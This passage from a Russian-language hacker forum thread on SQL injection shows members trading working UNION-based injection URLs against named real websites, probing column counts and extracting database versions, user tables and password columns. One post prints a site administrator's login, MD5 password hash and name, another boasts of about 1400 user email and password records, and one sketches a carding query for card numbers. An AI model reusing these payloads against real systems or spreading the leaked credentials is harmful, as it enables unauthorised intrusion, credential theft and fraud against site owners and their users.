SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Пожалуйста :)

    З.ы Spyder - жжошь... правда последний char в адресную строку не поместился.
     
    #1081 kamaz, 16 Mar 2007
    Last edited: 16 Mar 2007
  2. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    что-то я седня не в форме :)
    Code:
    http://www.pouet.net/prod.php?which=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+users/*
    колонки опять не подобрал........... ппц (
    версия 5.
     
    1 person likes this.
  3. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    n1†R0x

    Колонки то есть, но вот колонку с паролем не нашел ))
     
    1 person likes this.
  4. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    www.casinoratgeber.com

    Переходим на казино =)
    Code:
    http://www.casinoratgeber.com/index.php?bid=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
     
    3 people like this.
  5. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    аналогично)
    ps:
    Code:
    http://www.ipspackaging.com/packaging.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
    ничего стандартное не подошло :(
     
    3 people like this.
  6. Helios

    Helios Elder - Старейшина

    Joined:
    14 Jan 2007
    Messages:
    414
    Likes Received:
    180
    Reputations:
    103
    Еще скули:

    Code:
    http://itjob.dp.ua/search.php3?whatlooking=vacancies&searchtype=browse&category=9'
    Кол-во полей так и не подобрал(( При 16 ошибок 2 в других случаях 1
    
    http://itjob.dp.ua/product.php3?product=-1 union select 1,2,user(),4,5,6,7/*
    http://itjob.dp.ua/product.php3?product=-1 union select 1,2,user(),4,5,6/*
    Работает и та и та, ток выводит в разных местах)
    
     
    #1086 Helios, 16 Mar 2007
    Last edited: 16 Mar 2007
    1 person likes this.
  7. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Не трогать, она моя ща доделаю =)


    Вот, щас колонки пробью.

    Code:
    http://itjob.dp.ua/product.php3?product=-1+union+select+1,2,3,4,5,6,7+from+auth/*
    Code:
    http://itjob.dp.ua/product.php3?product=-1+union+select+1,2,name,4,5,6,7+from+auth/*
    Пасс чет не идет =(
     
    #1087 Ksander, 16 Mar 2007
    Last edited: 16 Mar 2007
    1 person likes this.
  8. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    =\
    CONCAT_WS рулит =\
     
    #1088 Spyder, 16 Mar 2007
    Last edited: 16 Mar 2007
    1 person likes this.
  9. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://bookashop.ru/book/?book=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11,12,13,14/*
     
  10. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Grey, проще использовать функцию CONCAT_WS(разделитель,строка1,строка2,...)
     
  11. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    чем проще?
     
  12. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Spyder, согласен. Но в случае с выводом всего двух столбцов разницы имхо никакой)
    так что:
    red-tape.org
    Code:
    http://www.red-tape.org/initiatives.php?id=-1+union+select+1,concat(email,0x3a,password),3,4,5,6,7,8,9,10,11+from+ld_users+limit+0,1/*
    около 1400 юзеров
    пассы в md5
    email:рass
     
    1 person likes this.
  13. Helios

    Helios Elder - Старейшина

    Joined:
    14 Jan 2007
    Messages:
    414
    Likes Received:
    180
    Reputations:
    103
    Вот, добил itjob.dp.ua:
    Code:
    http://itjob.dp.ua/product.php3?product=-1 union select 1,2,concat(id,char(58),login,char(58),passw,char(58),name),4,5,6 from auth/*
    
    Вот он, админчег:
    Code:
    1:admin:ee550a634df47433c1f0caf2ef867c4d:Yuriy S.
    
     
    3 people like this.
  14. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    [ cash ], ты наркоман что ле или просто не знаешь что делает эта функция?
    давай представим стандартный кардерский запрос c функцией concat()
    select+1,concat(id,char(58),email,char(58),ccn,char(58),name,......),3
    не проще ли сказать с помощью функцией CONCAT_WS()
    select+1,concat_ws(char(58),id,email,ccn,name,...),3

    Если ты просто не знаешь что она делает то эта функция в учебнике выглядит так CONCAT_WS(разделитель,строка1,строка2,строка3)
    Когда объеденяется 2 или 3 столбца то это конечно не нужно, но при больших запросах, где надо вывести много инфы лучше использовать эту функцию =)

    ЗЫ У тебя на сайте написано
    /me плачет
     
    #1094 Spyder, 16 Mar 2007
    Last edited: 16 Mar 2007
    1 person likes this.
  15. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.rda.ge/news.php?id=-4+union+select+1,2,CONCAT_WS(char(58),user(),database(),version()),4,5,6,7,8,9,10/*

    Code:
    http://www.nsf.ac.lk/events.php?ID=22%20UNION%20SELECT%201,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+mysql.user+limit+1,1/*
     
    #1095 XTErner, 17 Mar 2007
    Last edited: 17 Mar 2007
  16. chezz

    chezz Member

    Joined:
    19 Feb 2007
    Messages:
    33
    Likes Received:
    9
    Reputations:
    0
    Code:
    http://www.fur.su/index.php?id=-1+union+select+1,2,3,4,5/*&type=1&lang=r&pg=1
     
    1 person likes this.
  17. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    http://www.volgagis.ru/web/editweb.php?id=-1+union+select+1,2,3,4,convert(version()+using+cp1251),6,7,8,9,10,11,12,13/*
    __
    Наконец выходные!!! :) :D
     
    1 person likes this.
  18. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    http://www.opera.ge/eng/news.php?id=-328+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat(password,0x3a,username),21,22,23,24,25,26,27,28,29,30,31,32+from+users/*&menu=news

    ))думал браузер
     
    2 people like this.
  19. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    http://www.dama.cz/tisk.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,table_name,15,16,17,18+from+INFORMATION_SCHEMA.TABLES+limit+65,1/*

    5-ая версия))) 66 таблиц :) .
     
  20. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    гов =\ чё то там ничё не получается вывести
    update
     
    #1100 Spyder, 17 Mar 2007
    Last edited: 17 Mar 2007
Thread Status:
Not open for further replies.